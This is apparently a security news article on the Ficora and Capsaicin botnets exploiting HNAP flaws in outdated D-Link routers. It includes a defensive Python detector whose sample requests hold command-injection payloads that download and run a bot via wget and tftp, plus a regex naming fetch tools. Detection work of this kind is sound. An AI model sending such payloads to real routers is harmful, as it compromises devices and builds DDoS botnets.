Hackers abuse outdated D-Link routers for botnets
Take action: If you operate D-Link routers, be aware that they are actively targeted and exploited. Make sure the router firmware is updated to the latest version and replace any end-of-life devices that no longer receive security updates.
Two malware botnets - Ficora and Capsaicin - are targeting outdated D-Link routers. The campaign hits end-of-life D-Link devices and those running outdated firmware, including popular models such as the DIR-645, DIR-806, GO-RT-AC750, and DIR-845L.
For initial access the attackers exploit several known vulnerabilities, tracked as CVE-2015-2051 (CVSS score 9.8), CVE-2019-10891 (CVSS score 9.8), CVE-2022-37056 (CVSS score 9.8), and CVE-2024-33112 (CVSS score 7.5). None of these is new; the oldest was disclosed in 2015, and all of them have been patched in firmware that the affected models either no longer receive or have not had applied.
The flaws are weaknesses in D-Link's HNAP (Home Network Administration Protocol) management interface. The attackers send crafted HNAP requests that abuse the GetDeviceSettings action to execute arbitrary commands on the router, which lets them steal data and run shell scripts that download and install the bot. The primary purpose of the infections is to build a distributed denial-of-service (DDoS) network.
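As an added example (it is not code from the Fortinet report or from D-Link), the following Python detector scans raw HTTP requests for the pattern described above: HNAP requests whose GetDeviceSettings action, in the SOAPAction header or in the SOAP body, carries shell metacharacters or fetch-and-run commands. The request samples, IP addresses and command strings are constructed for illustration, and the list of suspicious tokens in INJECTION_RE is an assumption about what a benign GetDeviceSettings call never contains; a real deployment would run this over requests captured at the router's WAN side or from a reverse proxy in front of it.

```python
"""Flag HNAP GetDeviceSettings requests that carry command-injection payloads.

Added example, not code from the report or from D-Link.  The samples at the
bottom are constructed; the token list is an assumption, not a vendor signature.
"""
import re
from dataclasses import dataclass
from typing import Optional

HNAP_PATH = "/HNAP1/"
ACTION = "GetDeviceSettings"

# Shell metacharacters and fetch-and-run commands.  A legitimate
# GetDeviceSettings call names an action, nothing more, so any of these in
# the action string or the envelope is a strong injection indicator.
INJECTION_RE = re.compile(r"[`;|&$]|\b(wget|curl|tftp|busybox|chmod)\b")


@dataclass
class Finding:
    client: str
    action: str
    reason: str


def parse_request(raw: str):
    """Split a raw HTTP request into (request line, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def inspect(client: str, raw: str) -> Optional[Finding]:
    """Return a Finding if the request is an HNAP GetDeviceSettings injection attempt."""
    request_line, headers, body = parse_request(raw)
    parts = request_line.split()
    if len(parts) < 2 or not parts[1].startswith(HNAP_PATH):
        return None  # not an HNAP request at all
    action = headers.get("soapaction", "")
    # Both the SOAPAction header and the SOAP envelope are attacker-controlled
    # strings, so both are checked for the action name plus an injection token.
    for where, text in (("SOAPAction header", action), ("SOAP body", body)):
        if ACTION in text:
            match = INJECTION_RE.search(text)
            if match:
                return Finding(client, action,
                               f"injection token {match.group(0)!r} in {where}")
    return None


def scan(requests):
    """Run inspect() over (client, raw_request) pairs and collect the findings."""
    findings = []
    for client, raw in requests:
        finding = inspect(client, raw)
        if finding:
            findings.append(finding)
    return findings


# Constructed samples: one benign settings query, one injection through the
# SOAPAction header, one through the SOAP body, and one non-HNAP request that
# must not be flagged even though it contains a shell command.
SAMPLES = [
    ("192.168.0.23",
     'GET /HNAP1/ HTTP/1.1\r\nHost: 192.168.0.1\r\n'
     'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings"\r\n\r\n'),
    ("203.0.113.77",
     'POST /HNAP1/ HTTP/1.1\r\nHost: 192.168.0.1\r\n'
     'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/'
     '`wget http://203.0.113.5/bot.sh -O /tmp/bot.sh`"\r\n\r\n'),
    ("198.51.100.9",
     'POST /HNAP1/ HTTP/1.1\r\nHost: 192.168.0.1\r\n'
     'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings"\r\n'
     'Content-Type: text/xml\r\n\r\n'
     '<soap:Envelope><GetDeviceSettings>; cd /tmp; tftp -g -r bot 198.51.100.9;'
     ' chmod +x bot</GetDeviceSettings></soap:Envelope>'),
    ("203.0.113.80",
     'POST /login.cgi HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n'
     'user=admin;wget http://203.0.113.5/x'),
]

if __name__ == "__main__":
    for f in scan(SAMPLES):
        print(f"{f.client}: {f.reason}")
```

The check keys on the GetDeviceSettings action name because that is the action the campaign abuses; widening ACTION to every HNAP action would catch more but also needs a per-action whitelist to keep the false-positive rate low on a real management interface.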
The Ficora botnet, a newer variant of the Mirai botnet, showed no clear targeting pattern, with activity surges in October and November. Most of its infections were observed in Japan and the United States.
The Capsaicin botnet showed a concentrated burst of activity between October 21-22, primarily targeting East Asian countries.
The exact number of affected devices and the financial impact remain unclear. Users should ensure their router firmware is updated to the latest version, replace any end-of-life devices that no longer receive security updates, change default admin credentials to strong, unique passwords, and disable unnecessary remote access interfaces, in particular any management interface such as HNAP that is reachable from the WAN side.